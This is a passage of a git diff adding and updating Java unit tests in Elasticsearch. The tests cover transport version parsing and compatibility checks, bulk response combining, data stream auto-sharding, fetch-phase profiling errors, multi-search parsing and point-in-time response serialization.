TransportVersion.fromId(5_00_00_99).toString()); } + + public void testDuplicateConstants() { + List tvs = TransportVersion.getAllVersions(); + TransportVersion previous = tvs.get(0); + for (int i = 1; i < tvs.size(); i++) { + TransportVersion next = tvs.get(i); + if (next.id() == previous.id()) { + throw new AssertionError("Duplicate transport version id: " + next.id()); + } + previous = next; + } + } + + public void testLatest() { + TransportVersion latest = TransportVersion.parseFromBufferedReader( + "", + "/transport/definitions/" + Version.CURRENT.major + "." + Version.CURRENT.minor + ".csv", + TransportVersion.class::getResourceAsStream, + (c, p, br) -> TransportVersion.fromBufferedReader(c, p, true, false, br, Integer.MAX_VALUE) + ); + // TODO: once placeholder is removed, test the latest known version can be found fromName + // assertThat(latest, is(TransportVersion.fromName(latest.name()))); + } + + public void testSupports() { + byte[] data0 = "100001000,3001000".getBytes(StandardCharsets.UTF_8); + TransportVersion test0 = TransportVersion.fromBufferedReader( + "", + "testSupports0", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data0), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 2003000, null).supports(test0), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test0), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test0), is(true)); + + byte[] data1 = "3002000".getBytes(StandardCharsets.UTF_8); + TransportVersion test1 = TransportVersion.fromBufferedReader( + "", + "testSupports1", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data1), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 2003000, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3002000, null).supports(test1), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test1), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test1), is(true)); + + byte[] data2 = "3003000,2001001,1001001".getBytes(StandardCharsets.UTF_8); + TransportVersion test2 = TransportVersion.fromBufferedReader( + "", + "testSupports2", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data2), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 1001001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 1001002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 1002000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 1002001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 2001000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 2001001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 2001002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test2), is(true)); + + byte[] data3 = "100002000,3003001,2001002".getBytes(StandardCharsets.UTF_8); + TransportVersion test3 = TransportVersion.fromBufferedReader( + "", + "testSupports3", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data3), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1001002, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1001003, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1002001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1002002, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2001002, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 2001003, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3003001, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3003002, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3004000, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test3), is(true)); + + byte[] data4 = "100002000,3003002,2001003,1001002".getBytes(StandardCharsets.UTF_8); + TransportVersion test4 = TransportVersion.fromBufferedReader( + "", + "testSupports3", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data4), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 1001002, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 1001003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 1002001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 1002002, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 1002003, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2001002, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 2001003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 2001004, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003002, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3003004, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3004000, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test4), is(true)); + } } diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java index 2ddcaa5d97033..504ef488c5a92 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java @@ -194,8 +194,7 @@ public TestNode(String name, ThreadPool threadPool, Settings settings) { TransportService.NOOP_TRANSPORT_INTERCEPTOR, boundTransportAddressDiscoveryNodeFunction, null, - taskManager, - Tracer.NOOP + taskManager ); taskManager.setTaskCancellationService(new TaskCancellationService(transportService)); transportService.start(); diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java index 1d625cabe561d..4aa3673e604b0 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java @@ -78,7 +78,7 @@ public void testMissingStats() throws IOException { // Verify round trip Transport serialization. for (var transportVersion : List.of( - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersions.SNAPSHOT_INDEX_SHARD_STATUS_MISSING_STATS, TransportVersion.current() )) { diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java index b9dec26736cf2..15674e84f7170 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.cluster.state; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.io.stream.BytesStreamOutput; import org.elasticsearch.common.io.stream.StreamInput; @@ -39,7 +38,7 @@ public void testSerialization() throws Exception { TransportVersion testVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); if (randomBoolean()) { diff --git a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java index 824ad22b1af20..f62fd1408345b 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.indices.resolve; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; import org.elasticsearch.cluster.node.VersionInformation; @@ -54,7 +53,7 @@ public void testCCSCompatibilityCheck() { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion nextTransportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion nextTransportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java index 871932ca9dbc9..6e37335603572 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.indices.resolve; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; @@ -52,7 +51,7 @@ public void testCCSCompatibilityCheck() throws Exception { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java b/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java index 042a8422ca64d..7c1aad1a2af54 100644 --- a/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java +++ b/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java @@ -144,6 +144,18 @@ public void testToXContentPlacesErrorsFirst() throws IOException { } } + public void testCombineNoIngest() { + BulkResponse first = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + BulkResponse second = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + assertThat(BulkResponse.combine(List.of(first, second)).getIngestTookInMillis(), equalTo(NO_INGEST_TOOK)); + } + + public void testCombineOneIngest() { + BulkResponse first = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + BulkResponse second = new BulkResponse(new BulkItemResponse[0], 1, 2); + assertThat(BulkResponse.combine(List.of(first, second)).getIngestTookInMillis(), equalTo(2L)); + } + private static Tuple success( DocWriteRequest.OpType opType, XContentType xContentType diff --git a/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java b/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java index 403c395e31b57..0fa419be7b60b 100644 --- a/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java +++ b/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java @@ -1343,4 +1343,46 @@ private static Decision.Inputs createDecisionInputsForPeriodLoggerTests(int writ 3 ); } + + public void testCalculateReturnsNotApplicableForLookupIndexMode() { + var projectId = randomProjectIdOrDefault(); + ProjectMetadata.Builder builder = ProjectMetadata.builder(projectId); + DataStream dataStream = createLookupModeDataStream(builder); + ClusterState state = createClusterStateWithDataStream(builder); + + AutoShardingResult autoShardingResult = service.calculate( + state.projectState(projectId), + dataStream, + createIndexStats(1, 1.0, 1.0, 1.0) + ); + assertThat(autoShardingResult, is(NOT_APPLICABLE_RESULT)); + assertThat(decisionsLogged, hasSize(0)); + } + + public void testCalculateReturnsNotApplicableForLookupIndexModeWithNullStats() { + var projectId = randomProjectIdOrDefault(); + ProjectMetadata.Builder builder = ProjectMetadata.builder(projectId); + DataStream dataStream = createLookupModeDataStream(builder); + ClusterState state = createClusterStateWithDataStream(builder); + + AutoShardingResult autoShardingResult = service.calculate(state.projectState(projectId), dataStream, null); + assertThat(autoShardingResult, is(NOT_APPLICABLE_RESULT)); + assertThat(decisionsLogged, hasSize(0)); + } + + private DataStream createLookupModeDataStream(ProjectMetadata.Builder builder) { + DataStream dataStream = DataStream.builder(dataStreamName, List.of(new Index("test-index", randomUUID()))) + .setGeneration(1) + .setIndexMode(IndexMode.LOOKUP) + .build(); + builder.put(dataStream); + return dataStream; + } + + private ClusterState createClusterStateWithDataStream(ProjectMetadata.Builder builder) { + return ClusterState.builder(ClusterName.DEFAULT) + .nodes(DiscoveryNodes.builder().add(DiscoveryNodeUtils.create("n1"))) + .putProjectMetadata(builder.build()) + .build(); + } } diff --git a/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java b/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java index b60d3e0f08569..9632382996a7e 100644 --- a/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.fieldcaps; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; import org.elasticsearch.cluster.node.VersionInformation; @@ -52,7 +51,7 @@ public void testCCSCompatibilityCheck() { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java b/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java index 1978189c9dde4..b6ca12368f762 100644 --- a/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java @@ -50,6 +50,7 @@ import org.elasticsearch.search.SearchPhaseResult; import org.elasticsearch.search.SearchShardTarget; import org.elasticsearch.search.fetch.FetchPhase; +import org.elasticsearch.search.fetch.FetchPhaseExecutionException; import org.elasticsearch.search.fetch.FetchSearchResult; import org.elasticsearch.search.fetch.FetchSubPhase; import org.elasticsearch.search.fetch.FetchSubPhaseProcessor; @@ -63,6 +64,7 @@ import org.elasticsearch.search.internal.ShardSearchRequest; import org.elasticsearch.search.lookup.Source; import org.elasticsearch.search.profile.ProfileResult; +import org.elasticsearch.search.profile.Profilers; import org.elasticsearch.search.profile.SearchProfileQueryPhaseResult; import org.elasticsearch.search.profile.SearchProfileShardResult; import org.elasticsearch.search.query.QuerySearchResult; @@ -873,6 +875,63 @@ public StoredFieldsSpec storedFieldsSpec() { } } + public void testTimerStoppedAndSubPhasesExceptionsPropagate() throws IOException { + // if the timer is not stopped properly whilst profiling the fetch phase the exceptions + // in sub phases#setNextReader will not propagate as the cause that failed the fetch phase (instead a timer illegal state exception + // will propagate) + // this tests ensures that exceptions in sub phases are propagated correctly as the cause of the fetch phase failure (which in turn + // implies the timer was handled correctly) + Directory dir = newDirectory(); + RandomIndexWriter w = new RandomIndexWriter(random(), dir); + + String body = "{ \"thefield\": \" " + randomAlphaOfLength(48_000) + "\" }"; + for (int i = 0; i < 10; i++) { + Document document = new Document(); + document.add(new StringField("id", Integer.toString(i), Field.Store.YES)); + w.addDocument(document); + } + if (randomBoolean()) { + w.forceMerge(1); + } + IndexReader r = w.getReader(); + w.close(); + ContextIndexSearcher contextIndexSearcher = createSearcher(r); + try ( + SearchContext searchContext = createSearchContext( + contextIndexSearcher, + true, + new NoopCircuitBreaker(CircuitBreaker.REQUEST), + true + ) + ) { + FetchPhase fetchPhase = new FetchPhase(List.of(fetchContext -> new FetchSubPhaseProcessor() { + @Override + public void setNextReader(LeafReaderContext readerContext) throws IOException { + throw new IOException("bad things"); + } + + @Override + public void process(FetchSubPhase.HitContext hitContext) throws IOException { + Source source = hitContext.source(); + hitContext.hit().sourceRef(source.internalSourceRef()); + } + + @Override + public StoredFieldsSpec storedFieldsSpec() { + return StoredFieldsSpec.NEEDS_SOURCE; + } + })); + FetchPhaseExecutionException fetchPhaseExecutionException = assertThrows( + FetchPhaseExecutionException.class, + () -> fetchPhase.execute(searchContext, IntStream.range(0, 100).toArray(), null) + ); + assertThat(fetchPhaseExecutionException.getCause().getMessage(), is("bad things")); + } finally { + r.close(); + dir.close(); + } + } + private static ContextIndexSearcher createSearcher(IndexReader reader) throws IOException { return new ContextIndexSearcher(reader, null, null, new QueryCachingPolicy() { @Override @@ -910,13 +969,22 @@ public StoredFieldsSpec storedFieldsSpec() { } private static SearchContext createSearchContext(ContextIndexSearcher contextIndexSearcher, boolean allowPartialResults) { - return createSearchContext(contextIndexSearcher, allowPartialResults, null); + return createSearchContext(contextIndexSearcher, allowPartialResults, null, false); } private static SearchContext createSearchContext( ContextIndexSearcher contextIndexSearcher, boolean allowPartialResults, @Nullable CircuitBreaker circuitBreaker + ) { + return createSearchContext(contextIndexSearcher, allowPartialResults, circuitBreaker, false); + } + + private static SearchContext createSearchContext( + ContextIndexSearcher contextIndexSearcher, + boolean allowPartialResults, + @Nullable CircuitBreaker circuitBreaker, + boolean profileEnabled ) { IndexSettings indexSettings = new IndexSettings( IndexMetadata.builder("index") @@ -999,6 +1067,11 @@ public CircuitBreaker circuitBreaker() { return super.circuitBreaker(); } } + + @Override + public Profilers getProfilers() { + return profileEnabled ? new Profilers(contextIndexSearcher) : null; + } }; searchContext.addReleasable(searchContext.fetchResult()::decRef); searchContext.setTask(new SearchShardTask(-1, "type", "action", "description", null, Collections.emptyMap())); diff --git a/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java b/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java index 008230c5e3fe3..3ed63ff5e90d1 100644 --- a/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java @@ -9,6 +9,7 @@ package org.elasticsearch.action.search; +import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.CheckedBiConsumer; import org.elasticsearch.common.Strings; @@ -537,6 +538,14 @@ public void testFailOnExtraCharacters() throws IOException { } } + public void testNullIndex() throws IOException { + ElasticsearchParseException e = expectThrows(ElasticsearchParseException.class, () -> parseMultiSearchRequestFromString(""" + {"index": null} + { "query": {"match_all": {}}} + """)); + assertThat(e.getMessage(), containsString("Expected a list of strings but got null")); + } + private static MultiSearchRequest mutate(MultiSearchRequest searchRequest) throws IOException { MultiSearchRequest mutation = copyRequest(searchRequest); List> mutators = new ArrayList<>(); diff --git a/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java b/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java new file mode 100644 index 0000000000000..3ed88419ab8d5 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java @@ -0,0 +1,57 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.action.search; + +import org.elasticsearch.common.bytes.BytesArray; +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentType; + +import java.io.IOException; +import java.util.Base64; +import java.util.Locale; + +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertToXContentEquivalent; + +public class OpenPointInTimeResponseTests extends ESTestCase { + + public void testIdCantBeNull() { + BytesReference pointInTimeId = null; + expectThrows(NullPointerException.class, () -> { new OpenPointInTimeResponse(pointInTimeId, 11, 8, 2, 1); }); + } + + public void testToXContent() throws IOException { + String id = "test-id"; + BytesReference pointInTimeId = new BytesArray(id); + + BytesReference actual; + try (XContentBuilder builder = XContentBuilder.builder(XContentType.JSON.xContent())) { + OpenPointInTimeResponse response = new OpenPointInTimeResponse(pointInTimeId, 11, 8, 2, 1); + response.toXContent(builder, ToXContent.EMPTY_PARAMS); + actual = BytesReference.bytes(builder); + } + + String encodedId = Base64.getUrlEncoder().encodeToString(BytesReference.toBytes(pointInTimeId)); + BytesReference expected = new BytesArray(String.format(Locale.ROOT, """ + { + "id": "%s", + "_shards": { + "total": 11, + "successful": 8, + "failed": 2, + "skipped": 1 + } + } + """, encodedId)); + assertToXContentEquivalent(expected, actual, XContentType.JSON); + } +} diff --git a/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java b/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java index d7348833c757a..2a9d12b27507d 100644 --- a/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.search.SortField; import org.apache.lucene.search.TopFieldDocs; import org.apache.lucene.search.TotalHits; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.cluster.ClusterName; @@ -21,6 +22,7 @@ import org.elasticsearch.cluster.node.DiscoveryNodeUtils; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.TopDocsAndMaxScore; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.TimeValue; @@ -41,6 +43,7 @@ import org.elasticsearch.transport.Transport; import org.elasticsearch.transport.TransportService; +import java.io.IOException; import java.util.Collections; import java.util.List; import java.util.Map; @@ -48,6 +51,7 @@ import java.util.concurrent.CountDownLatch; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.LongSupplier; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; @@ -243,4 +247,191 @@ protected void run() { assertThat(((FieldDoc) phase.sortedTopDocs().scoreDocs()[0]).fields[0], equalTo(0)); } } + + static class BadRawDocValueFormat implements DocValueFormat { + @Override + public String getWriteableName() { + return "bad"; + } + + @Override + public void writeTo(StreamOutput out) throws IOException {} + + @Override + public Object format(long value) { + if (value == Long.MAX_VALUE) { + // Simulate a bad value that cannot be formatted correctly + throw new IllegalArgumentException("Cannot format Long.MAX_VALUE"); + } + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public Object format(double value) { + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public Object format(BytesRef value) { + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public long parseLong(String value, boolean roundUp, LongSupplier now) { + return RawDocValueFormat.INSTANCE.parseLong(value, roundUp, now); + } + + @Override + public double parseDouble(String value, boolean roundUp, LongSupplier now) { + return RawDocValueFormat.INSTANCE.parseLong(value, roundUp, now); + } + + @Override + public BytesRef parseBytesRef(Object value) { + return RawDocValueFormat.INSTANCE.parseBytesRef(value); + } + + @Override + public Object formatSortValue(Object value) { + return RawDocValueFormat.INSTANCE.formatSortValue(value); + } + } + + // Test what happens if doc formatter fails to format the bottom sort values + public void testBadFormatting() throws Exception { + final TransportSearchAction.SearchTimeProvider timeProvider = new TransportSearchAction.SearchTimeProvider( + 0, + System.nanoTime(), + System::nanoTime + ); + + Map lookup = new ConcurrentHashMap<>(); + DiscoveryNode primaryNode = DiscoveryNodeUtils.create("node1"); + DiscoveryNode replicaNode = DiscoveryNodeUtils.create("node2"); + lookup.put("node1", new SearchAsyncActionTests.MockConnection(primaryNode)); + lookup.put("node2", new SearchAsyncActionTests.MockConnection(replicaNode)); + + int numShards = randomIntBetween(10, 20); + int numConcurrent = randomIntBetween(1, 4); + AtomicInteger numWithTopDocs = new AtomicInteger(); + AtomicInteger successfulOps = new AtomicInteger(); + AtomicBoolean canReturnNullResponse = new AtomicBoolean(false); + var transportService = mock(TransportService.class); + when(transportService.getLocalNode()).thenReturn(primaryNode); + SearchTransportService searchTransportService = new SearchTransportService(transportService, null, null) { + @Override + public void sendExecuteQuery( + Transport.Connection connection, + ShardSearchRequest request, + SearchTask task, + ActionListener listener + ) { + int shardId = request.shardId().id(); + if (request.canReturnNullResponseIfMatchNoDocs()) { + canReturnNullResponse.set(true); + } + if (request.getBottomSortValues() != null) { + numWithTopDocs.incrementAndGet(); + } + QuerySearchResult queryResult = new QuerySearchResult( + new ShardSearchContextId("N/A", 123), + new SearchShardTarget("node1", new ShardId("idx", "na", shardId), null), + null + ); + try { + SortField sortField = new SortField("RegistrationDate", SortField.Type.LONG); + queryResult.topDocs( + new TopDocsAndMaxScore( + new TopFieldDocs( + new TotalHits(1, TotalHits.Relation.GREATER_THAN_OR_EQUAL_TO), + new FieldDoc[] { new FieldDoc(0, Float.NaN, new Object[] { Long.MAX_VALUE }) }, + new SortField[] { sortField } + ), + Float.NaN + ), + new DocValueFormat[] { new BadRawDocValueFormat() } + ); + queryResult.from(0); + queryResult.size(1); + successfulOps.incrementAndGet(); + queryResult.incRef(); + new Thread(() -> ActionListener.respondAndRelease(listener, queryResult)).start(); + } finally { + queryResult.decRef(); + } + } + }; + CountDownLatch latch = new CountDownLatch(1); + List shardsIter = SearchAsyncActionTests.getShardsIter( + "idx", + new OriginalIndices(new String[] { "idx" }, SearchRequest.DEFAULT_INDICES_OPTIONS), + numShards, + randomBoolean(), + primaryNode, + replicaNode + ); + final SearchRequest searchRequest = new SearchRequest(); + searchRequest.setMaxConcurrentShardRequests(numConcurrent); + searchRequest.setBatchedReduceSize(2); + searchRequest.source(new SearchSourceBuilder().size(1).sort(SortBuilders.fieldSort("timestamp"))); + searchRequest.source().trackTotalHitsUpTo(2); + searchRequest.allowPartialSearchResults(false); + SearchPhaseController controller = new SearchPhaseController((t, r) -> InternalAggregationTestCase.emptyReduceContextBuilder()); + SearchTask task = new SearchTask(0, "n/a", "n/a", () -> "test", null, Collections.emptyMap()); + try ( + QueryPhaseResultConsumer resultConsumer = new QueryPhaseResultConsumer( + searchRequest, + EsExecutors.DIRECT_EXECUTOR_SERVICE, + new NoopCircuitBreaker(CircuitBreaker.REQUEST), + controller, + task::isCancelled, + task.getProgressListener(), + shardsIter.size(), + exc -> {} + ) + ) { + SearchQueryThenFetchAsyncAction action = new SearchQueryThenFetchAsyncAction( + logger, + null, + searchTransportService, + (clusterAlias, node) -> lookup.get(node), + Collections.singletonMap("_na_", AliasFilter.EMPTY), + Collections.emptyMap(), + EsExecutors.DIRECT_EXECUTOR_SERVICE, + resultConsumer, + searchRequest, + null, + shardsIter, + timeProvider, + new ClusterState.Builder(new ClusterName("test")).build(), + task, + SearchResponse.Clusters.EMPTY, + null, + false + ) { + @Override + protected SearchPhase getNextPhase() { + return new SearchPhase("test") { + @Override + protected void run() { + latch.countDown(); + } + }; + } + + @Override + void onShardFailure(int shardIndex, SearchShardTarget shardTarget, Exception e) { + latch.countDown(); + fail(e, "Unexpected shard failure"); + } + }; + action.start(); + latch.await(); + assertThat(successfulOps.get(), equalTo(numShards)); + SearchPhaseController.ReducedQueryPhase phase = action.results.reduce(); + 